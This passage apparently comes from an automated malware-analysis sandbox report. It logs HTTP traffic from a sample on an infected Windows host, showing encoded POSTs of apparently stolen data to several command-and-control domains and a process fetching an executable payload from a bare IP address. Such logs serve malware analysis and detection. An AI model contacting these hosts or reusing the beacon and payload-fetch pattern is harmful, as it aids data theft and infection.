                                                                        Data Ascii: 9B_ppt=HYugaIXnf+P98j1pw1hOimuTF+PtL+KNdLny4EIfHpuhesSndZyfsRwV7OnyUdWeC/Yym3+9uCzSJq3AJ1JGK8KT/iOHN2nHmSO1BDe5RFTqlQaJ2sfr5VfGiD6hwPGYaHwtx8YrrqqHMs4um9l1VGOi9hqrN921IB9VBl80MbYgkFhJWew9rVJ9zXPcQzG1PSdW8SSH2d0wKcxwPR2oVY6pmPj5Vzr5Ojy0Iu9ulNxLXG+1Ad9conm755dSr5Zsm73stduP+xgFBvSyrJ86lqx6YU8r/LTfE//TJid6GtfTl9QohB6aN6lBSvRCxtYF0w6nMS7SSNpKVuZ+/ftKkPylHWkgOkPt5FV85PAdOa6Gi9EpBskpvDqSD77CIyth/w8gkhuGpyOlqJxP5D6JdZnvftAF0OX4x6KJHwPJnWZdSVfpWZYXlIz99eIV12gPUj2eNGTsw7YgR0RMmcQndmgEqPT5JY4VRXeSiOT7WbOPq2OmNms6T+wnCPvbLUxpGaRnIpYnsKodgFt/jgsc9jChusKYNSeq/WyGOF46NZ823Sz89rMGJfbzZau/cBq2teDH74xE6OO929+d2e3sLQrE9CQcsa5fLXjWDqYh4c3XxciBpH0uOZ0cPRnIH3zlkunRcmoiApE2PrvzqEn2Z39RZTLhfTGmpfupkEFgbaw8m0DwCdHEjHJipftBiKBEoidrI5cVwnA4jAGQ8INsplFwEnycqu7QY3bsUrhWbV3PGnuNp5U6T33by+TyjaHbLhuWuRoDHU8GfxEe8iHCdVXnaeF/sYYaTDn/2s5mZ4UGrmHzupdeknl8qwqZYkKTQ6568UxE7zvLSQB8vaX13g349Pxsr+Hw1MDNEEiJDEpAQX96LXbz1mdgz5aONTqxeuieGfsyY6wClAbImWP1/olWFMngUghyuAyKIdLQxEwtwrRuPAOCjn42ajb0X9NjcyztbNvJVGhBp5lFj+rgPJfOIHaczvmkT2J+Ft3CKrWTp [TRUNCATED]
Dec 13, 2024 13:07:25.936115980 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:25 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Dec 13, 2024 13:07:25.936146975 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49786 | 161.97.142.144 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:27.315848112 CET | 512 | OUT | GET /fc2m/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=KaGAZ9vwQsncwU5nwlZluG2PCpLyPNSLaK7d9k0MP6z2D5ilW5umnwpx9tHUSLWoKaQi0X2AhHSzaYzkOXBuKcmexX+9MUXLmjX2PXKDTiDXtSOs+tfg8AM= HTTP/1.1
                                                                        Host: www.030002128.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Dec 13, 2024 13:07:28.567853928 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Fri, 13 Dec 2024 12:07:28 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 2966
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: "66cce1df-b96"
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Dec 13, 2024 13:07:28.567878962 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Dec 13, 2024 13:07:28.567894936 CET | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49802 | 209.74.64.58 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:34.109224081 CET | 785 | OUT | POST /0b3u/ HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.quicktraze.website
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.quicktraze.website/0b3u/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 67 55 39 73 56 6d 6d 56 77 55 41 48 36 35 79 32 35 44 69 77 2b 74 67 7a 50 44 4a 77 4b 4f 48 73 48 74 54 77 48 55 4f 51 4a 52 48 6b 54 5a 47 53 4e 67 61 50 51 35 43 76 70 35 48 6d 72 34 68 62 35 70 61 65 49 61 4c 79 5a 53 57 38 43 37 78 75 6d 4c 78 4a 6a 4b 56 41 39 4c 4e 54 2f 37 36 71 74 67 39 41 2f 4b 6f 74 5a 37 6b 32 42 56 4a 6b 37 44 42 46 4b 64 33 4a 67 54 66 6a 4d 56 33 66 7a 4f 54 44 43 64 54 36 37 55 35 6e 4f 4f 63 41 6d 63 50 38 46 39 44 42 59 48 44 72 65 79 58 56 6d 32 7a 62 71 6c 50 4e 70 64 59 4f 56 35 56 6d 39 32 79 59 34 63 78 77 36 74 6a 46 4b 66 47 4c 73 67 3d 3d
                                                                        Data Ascii: 9B_ppt=gU9sVmmVwUAH65y25Diw+tgzPDJwKOHsHtTwHUOQJRHkTZGSNgaPQ5Cvp5Hmr4hb5paeIaLyZSW8C7xumLxJjKVA9LNT/76qtg9A/KotZ7k2BVJk7DBFKd3JgTfjMV3fzOTDCdT67U5nOOcAmcP8F9DBYHDreyXVm2zbqlPNpdYOV5Vm92yY4cxw6tjFKfGLsg==
Dec 13, 2024 13:07:35.326441050 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Fri, 13 Dec 2024 12:07:35 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49813 | 209.74.64.58 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:36.772923946 CET | 805 | OUT | POST /0b3u/ HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.quicktraze.website
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.quicktraze.website/0b3u/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 67 55 39 73 56 6d 6d 56 77 55 41 48 6f 4c 6d 32 2f 67 4b 77 34 4e 67 79 42 6a 4a 77 54 65 48 6f 48 74 58 77 48 58 44 4e 4f 6a 6a 6b 53 34 32 53 4d 69 79 50 54 35 43 76 69 5a 48 2f 31 49 68 4d 35 70 57 57 49 59 50 79 5a 55 36 38 43 37 42 75 6d 62 4e 4b 69 61 56 65 32 72 4e 52 37 37 36 71 74 67 39 41 2f 4b 38 48 5a 37 38 32 42 6c 35 6b 70 78 70 47 57 4e 33 4b 33 6a 66 6a 66 46 33 54 7a 4f 53 67 43 63 2f 55 37 58 52 6e 4f 4c 59 41 6d 4f 6e 39 4b 39 43 4b 56 6e 43 53 57 42 32 44 71 6b 36 31 6f 54 53 70 69 76 4d 4a 51 2f 59 38 73 48 54 50 71 63 56 44 6e 71 71 78 48 63 37 43 33 73 6c 69 35 41 74 7a 4a 6d 4a 54 67 4d 50 64 62 54 6b 4c 68 34 4d 3d
                                                                        Data Ascii: 9B_ppt=gU9sVmmVwUAHoLm2/gKw4NgyBjJwTeHoHtXwHXDNOjjkS42SMiyPT5CviZH/1IhM5pWWIYPyZU68C7BumbNKiaVe2rNR776qtg9A/K8HZ782Bl5kpxpGWN3K3jfjfF3TzOSgCc/U7XRnOLYAmOn9K9CKVnCSWB2Dqk61oTSpivMJQ/Y8sHTPqcVDnqqxHc7C3sli5AtzJmJTgMPdbTkLh4M=
Dec 13, 2024 13:07:38.014288902 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Fri, 13 Dec 2024 12:07:37 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49819 | 209.74.64.58 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:07:39.433037996 CET | 10887 | OUT | POST /0b3u/ HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.quicktraze.website
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.quicktraze.website/0b3u/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 67 55 39 73 56 6d 6d 56 77 55 41 48 6f 4c 6d 32 2f 67 4b 77 34 4e 67 79 42 6a 4a 77 54 65 48 6f 48 74 58 77 48 58 44 4e 4f 6a 72 6b 53 50 65 53 4e 45 36 50 53 35 43 76 72 35 48 69 31 49 68 4e 35 70 4f 53 49 59 43 48 5a 58 4f 38 44 59 35 75 32 34 56 4b 6f 61 56 65 35 4c 4e 53 2f 37 36 2f 74 67 4e 45 2f 4b 73 48 5a 37 38 32 42 6d 68 6b 2b 7a 42 47 47 39 33 4a 67 54 65 69 4d 56 33 33 7a 4f 4c 62 43 63 4c 71 36 6d 78 6e 41 4c 49 41 72 64 50 39 48 39 43 49 55 6e 43 6a 57 42 37 64 71 6b 6d 54 6f 54 50 4d 69 74 51 4a 51 61 6c 77 2f 54 54 41 2b 66 4e 48 35 4d 69 52 50 4f 44 43 30 75 6b 65 6f 6b 64 56 66 57 39 54 37 4d 58 56 43 42 38 78 69 76 37 4b 79 56 63 6d 75 74 2f 49 73 34 74 71 64 46 59 59 46 4f 6d 49 52 4a 50 4f 43 31 6a 41 6b 6e 30 6b 54 70 34 63 33 4a 31 78 73 5a 70 69 35 71 73 48 58 4f 75 75 37 73 66 76 66 6a 34 33 51 72 76 65 7a 48 6e 71 77 52 37 4b 4a 78 54 4e 45 2f 51 6e 54 32 53 39 39 68 65 5a 51 5a 4a 43 54 4b 39 50 65 39 2f 58 4a 71 4d 46 39 67 59 64 6e 54 43 4a 49 57 65 [TRUNCATED]
Data Ascii: 9B_ppt= [TRUNCATED]
Dec 13, 2024 13:07:40.717149973 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Fri, 13 Dec 2024 12:07:40 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.4 | 49825 | 209.74.64.58 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:07:42.084146023 CET | 517 | OUT | GET /0b3u/?9B_ppt=tWVMWWWOulwRw9KA3wu02d5KKGx3TcL9CpbeAEn5Jw6VZuj1AgCYZL+g8ZTCy/ZQwoOBNq7+YyWmcbYUwrN2tYgo9+cX77aYkG8YuMsAadwBJ35R4yxBFts=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.quicktraze.website
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:07:43.304805994 CET | 219 | IN | HTTP/1.1 200 OK
                                                                        Date: Fri, 13 Dec 2024 12:07:43 GMT
                                                                        Server: Apache
                                                                        Content-Length: 68
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Data Raw: 76 57 4a 57 4c 47 75 45 75 45 63 69 71 59 36 56 2f 68 72 48 67 4a 77 7a 5a 33 52 33 4b 71 43 58 58 64 69 52 65 79 65 55 65 68 6e 43 54 62 4c 46 47 67 4b 48 62 4f 6d 50 73 74 66 4b 35 4e 35 45 2b 71 6d 77
                                                                        Data Ascii: vWJWLGuEuEciqY6V/hrHgJwzZ3R3KqCXXdiReyeUehnCTbLFGgKHbOmPstfK5N5E+qmw


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.4 | 49836 | 45.200.148.45 | 80 | 1908 | C:\Windows\SysWOW64\recover.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:07:46.392812014 CET | 232 | OUT | GET /dashboard/xl.exe HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Host: 45.200.148.45
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.4 | 49886 | 45.200.148.45 | 80 | 1908 | C:\Windows\SysWOW64\recover.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:08.416538000 CET | 202 | OUT | GET /dashboard/xl.exe HTTP/1.1
                                                                        Host: 45.200.148.45
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.4 | 49946 | 104.21.74.79 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:33.940336943 CET | 764 | OUT | POST /irzc/ HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tenmyk.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.tenmyk.shop/irzc/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
